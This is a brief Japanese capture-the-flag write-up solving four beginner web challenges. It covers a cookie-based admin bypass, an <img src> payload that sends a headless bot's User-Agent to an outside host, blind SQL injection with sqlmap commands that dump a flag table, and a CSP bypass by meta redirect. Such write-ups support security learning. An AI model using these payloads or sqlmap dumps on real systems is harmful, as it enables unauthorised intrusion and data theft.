説明

ユーザー名を入れるフォームと php のコードが書いてある

解法

どうやら admin でログインできれば良さそう

• $usernameがadminなら OK
• $username = htmlspecialchars($_COOKIE['name'], ENT_QUOTES, "UTF-8");
• なので cookie を適当にやれば... と思ったけどそもそ
• setcookie("name", $_POST['name'], time()+3600); してるので
• フォームに admin と入れる → 偽管理者と怒られるがもう cookie に set してあるので そのままリロードすればOK

説明

件名と本文を登録すると 次の瞬間に ヘッドレスブラウザが動いて 定型文を post するシステム

解法

このヘッドレスブラウザ の UA が flag

• なので ヘッドレスブラウザ から 適当な ホストへ リクエストが飛べばいい
• EC2か何かのURLを <img src=http://hogehoge> とかして 本文に書き込めばOK

説明

在庫一覧が表示されるページ

解法

• どうやら http://goods.chall.beginners.seccon.jp/items.php?minstock=0 の json が表示されている
• この minstock は 単純な数字のほか 2+3 とか簡単な計算式でも OK
• この minstock に select count(*) from items と入れると minstock=8 と同じ挙動
• なので ブラインドSQLインジェクションができそう
• あとは sqlmap すればいいだけ

sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 --dbs
sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 --tables
sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 -T flag --dump

説明

Gimme your comment と大体同じだけど今度は
CSP https://developer.mozilla.org/ja/docs/Web/HTTP/CSP　で対策されている

• Content-Security-Policy: default-src 'self'

解法

• headless ブラウザで適当なところにアクセスさせたいだけなので
• meta タグで redirect すれば OK